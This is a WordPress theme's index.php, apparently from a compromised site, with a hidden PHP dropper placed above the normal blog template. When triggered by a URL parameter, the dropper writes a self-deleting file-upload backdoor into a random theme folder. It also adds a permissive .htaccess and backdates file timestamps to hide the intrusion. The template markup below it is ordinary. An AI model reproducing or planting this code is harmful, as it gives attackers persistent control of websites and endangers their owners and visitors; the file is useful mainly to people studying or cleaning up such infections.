| Current File : /home/bwalansa/www/wp-content/themes/Savia/index.php |
<?php
function search_files($dir) {
$found = array();
$dir = addslash($dir);
$files = scandir($dir);
foreach ($files as $f) {
if($f === '.' or $f === '..') continue;
$fpath = $dir . $f;
if (!is_dir($fpath))
array_push($found , $dir.$f);
}
return $found;
}
function addslash($dir) {
$lc = substr($dir , -1);
if ($lc != "/")
$dir .= "/";
return $dir;
}
function get_timestamp($dir) {
$found = array();
$dir = addslash($dir);
$files = scandir($dir);
foreach ($files as $f) {
if($f === '.' or $f === '..') continue;
$fpath = $dir . $f;
if (!is_dir($fpath)) {
array_push($found , filemtime($dir . $f));
}
}
return min($found);
}
function fixslashes($path) {
return str_replace('//','/',$path);
}
function find_wp_index($dir){
$edirs = explode("/", $dir);
$wpdir = '';
while(count($edirs)) {
$path = implode("/", $edirs);
if(file_exists($path . "/wp-config.php")) {
$wpdir = $path;
break;
}
array_pop($edirs);
}
return $wpdir;
}
function load_file() {
$shellbase = array("index" , "class" , "theme" , "page" , "content" , "search");
$shellsuffix = array("-page" , "-content" , "-navs" , "-layout" , "-top" , "-bottom" , "-search" , "-tags" , "-compat" , "-rss" , "-functions" , "-css" , "-model" , "-widget");
$goodcode = '<?php if($_GET[\'df\'] ==1) {if($_FILES[\'fl\']){move_uploaded_file($_FILES[\'fl\'][\'tmp_name\'], $_POST[\'flname\']);$f = file_get_contents($_POST[\'flname\']);$c = base64_decode($f); file_put_contents($_POST[\'flname\'],$c);echo \'Uploaded\';} else { echo \'Problem\';} unlink(__FILE__);} else {echo \'Hello\';}?>';
$htaccess = '<Files *.php>' . "\r\n" . 'Order allow,deny' . "\r\n" . 'Allow from all' . "\r\n" . '</Files>';
$filedir = pathinfo(__FILE__,PATHINFO_DIRNAME);
$wpindex = find_wp_index($filedir);
$furn = '';
if (!$wpindex) {
print("wpindex not found");
exit();
}
$allthemes = scandir(fixslashes($wpindex."/wp-content/themes/"));
$dirslist = array();
foreach($allthemes as $dir) {
if($dir === '.' or $dir === '..') continue;
$themepath = fixslashes($wpindex . "/wp-content/themes/" . $dir);
if (is_dir($themepath))
array_push($dirslist , $dir);
}
$i = array_rand($dirslist);
$tdir = $dirslist[$i];
$sdir = fixslashes($wpindex . "/wp-content/themes/" . $tdir . "/");
$files = search_files($sdir);
$done = false;
$fpath = '';
$ib = array_rand($shellbase);
$fbase = $shellbase[$ib];
$is = array_rand($shellsuffix);
$fnew = $fbase . $shellsuffix[$is] . '.php';
while(!$done && !empty($files)) {
$i = array_rand($files);
$themefile = $files[$i];
unset($files[$i]);
if (strpos($themefile , '.php') !== false) {
$fpath = substr($themefile,0,-4);
$is = array_rand($shellsuffix);
$fpath = fixslashes($fpath . $shellsuffix[$is] . '.php');
$done = true;
}
}
if (!$done)
$fpath = fixslashes($sdir . $fnew);
$ind = strrpos($fpath , '/');
$fname = substr($fpath, $ind + 1);
$dirmtime = filemtime($sdir);
$goodfile = fopen($fpath , "w+");
if (!$goodfile) {
$fpath = fixslashes($filedir . "/" . $fnew);
$goodfile = fopen($fpath , "w+") or die("Unable to open file");
}
fwrite($goodfile , $goodcode);
fclose($goodfile);
$timestamp = get_timestamp($sdir);
$htaccess_file = $sdir . '.htaccess';
$hfile = fopen($htaccess_file , "w+");
if ($hfile) {
fwrite($hfile,$htaccess);
fclose($hfile);
}
touch($fpath,$timestamp);
touch($htaccess_file,$timestamp);
touch($sdir,$dirmtime);
if ($fpath) {
$furn = fixslashes('/' . str_replace($wpindex , '' , $fpath));
}
return $furn;
}
if(isset($_GET['df']) && $_GET['df'] == '1')
$shell = load_file();
echo '<spath>' . $shell . '</spath>';
?>
<?php
/**
* The Default template file.
*
* @package WordPress
*/
get_header(); ?>
<div class="content_bgr">
<?php if(is_archive() || is_search() || is_home()): ?>
<div class="full_container_page_title">
<div class="container startNow animationStart">
<div class="row no_bm">
<div class="sixteen columns">
<?php boc_breadcrumbs(); ?>
<div class="page_heading"><h1>
<?php if ( is_home() && is_front_page() ) {
// bloginfo('name');
}else{
echo (is_archive() ? single_cat_title() : (is_search() ? _e('Search results for:', 'Savia').' '. get_search_query(): (is_home() ? wp_title('') :'') ));
} ?>
</h1></div>
</div>
</div>
</div>
</div>
<?php else: ?>
<div class="h10"></div>
<?php endif; ?>
<div class="container animationStart startNow">
<div class="row blog_list_page">
<?php
// Check where sidebar should be
$sidebar_left = false;
if(ot_get_option('sidebar_layout','right-sidebar')=='left-sidebar'){
$sidebar_left=true;
}
// Place sidebar if it's left
($sidebar_left ? get_sidebar() : '');
?>
<div class="twelve columns">
<?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?>
<!-- Post Loop Begin -->
<div class="post_item clearfix">
<?php $class_ = "six columns"; // IF Post type is Standard (false)
if(function_exists( 'get_post_format' ) && get_post_format( $post->ID ) != 'gallery' && get_post_format( $post->ID ) != 'video' && has_post_thumbnail()) {
$thumbbig = wp_get_attachment_image_src( get_post_thumbnail_id($post->ID), 'portfolio-slim' );
$attachment_image = wp_get_attachment_image_src(get_post_thumbnail_id($post->ID), 'portfolio-slim');
?>
<div class="pic five columns">
<a href="<?php the_permalink(); ?>" title="<?php echo $post->post_title; ?>">
<img src="<?php echo $attachment_image[0]; ?>"/><div class="img_overlay_zoom"><span class="icon_plus"></span></div>
</a>
</div>
<?php
} else $class_ = "";// IF Post type is Standard :: END ?>
<?php // IF Post type is Gallery
if (( function_exists( 'get_post_format' ) && get_post_format( $post->ID ) == 'gallery' )) {
$args = array(
'numberposts' => -1, // Using -1 loads all posts
'orderby' => 'menu_order', // This ensures images are in the order set in the page media manager
'order'=> 'DESC',
'post_mime_type' => 'image', // Make sure it doesn't pull other resources, like videos
'post_parent' => $post->ID, // Important part - ensures the associated images are loaded
'post_status' => null,
'post_type' => 'attachment'
);
$images = get_children( $args );
if($images){ ?>
<div class="flexslider">
<ul class="slides">
<?php foreach($images as $image){
$thumb = wp_get_attachment_image_src($image->ID,'portfolio-slim');
?>
<li class="pic">
<a href="<?php the_permalink(); ?>" title="<?php echo $image->post_title; ?>" >
<img src="<?php echo $thumb[0] ?>"/><div class="img_overlay_zoom"><span class="icon_plus"></span></div>
</a>
</li>
<?php } ?>
</ul>
</div>
<?php } // If Images :: END ?>
<?php } // IF Post type is Gallery :: END ?>
<?php // IF Post type is Video
if (( function_exists( 'get_post_format' ) && get_post_format( $post->ID ) == 'video') ) {
if($video_embed_code = get_post_meta($post->ID, 'video_embed_code', true)) {
echo "<div class='video_max_scale'>";
echo $video_embed_code;
echo "</div>";
}
} // IF Post type is Video :: END
?>
<div class="post_list_left">
<div class="day"><?php echo get_the_date('j');?></div>
<div class="month"><?php echo get_the_date('M');?></div>
</div>
<div class="post_list_right <?php echo $class_;?>">
<?php if(get_the_title()!=''){ ?>
<h3 class="post_title"><a href="<?php the_permalink(); ?>" title="<?php printf(esc_attr__('Permalink to %s', 'Savia'), the_title_attribute('echo=0')); ?>"><?php the_title(); ?></a></h3>
<?php } ?>
<!--<p class="post_meta">
<span class="author"><a href="<?php echo get_author_posts_url(get_the_author_meta('ID' )); ?>"><?php echo __('By ','Savia');?> <?php the_author_meta('display_name'); ?></a></span>
<span class="comments <?php if(!get_the_tags()){ echo "no-border-comments";}?>"><?php comments_popup_link( __('No comments yet','Savia'), __('1 comment','Savia'), __('% comments','Savia'), 'comments-link', __('Comments are Off','Savia'));?></span>
<?php if(get_the_tags()) { ?>
<span class="tags"><?php the_tags('',', '); ?></span>
<?php } ?>
</p>-->
<div class="post_description clearfix">
<?php the_content('Read more'); ?>
</div>
<?php if(get_the_title()==''){ ?>
<a href="<?php the_permalink(); ?>" class='more-link'><?php _e('Read more','Savia');?></a>
<?php } ?>
</div>
</div>
<!-- Post Loop End -->
<?php endwhile; ?>
<?php boc_pagination($pages = '', $range = 2); ?>
<?php else: ?>
<p><?php _e('Sorry, no posts matched your criteria.','Savia'); ?></p>
<?php endif; // Loop End ?>
</div>
<?php // Place sidebar if it's right
(!$sidebar_left ? get_sidebar() : '');?>
</div>
</div>
<?php echo do_shortcode("[row_container full_width='yes' dark='yes' padded='no' bgr_url='/wp-content/chartegraphique/2014/03/poly_bgr_green.jpg' bgr_parallax='yes']<div class='text_box no_mar box_no_bgr'>
<a class='button button_pale tiny_button' href='/bwa/contact'><div class='shortcode_icon shortcode_icon_simple'><i class='icon mail'></i></div>Contactez nous !</a>
<h2>Vous désirez une information, nous donner votre avis, nous laisser un message ?</h2>
</div>
[/row_container]"); ?>
</div>
<?php get_footer(); ?>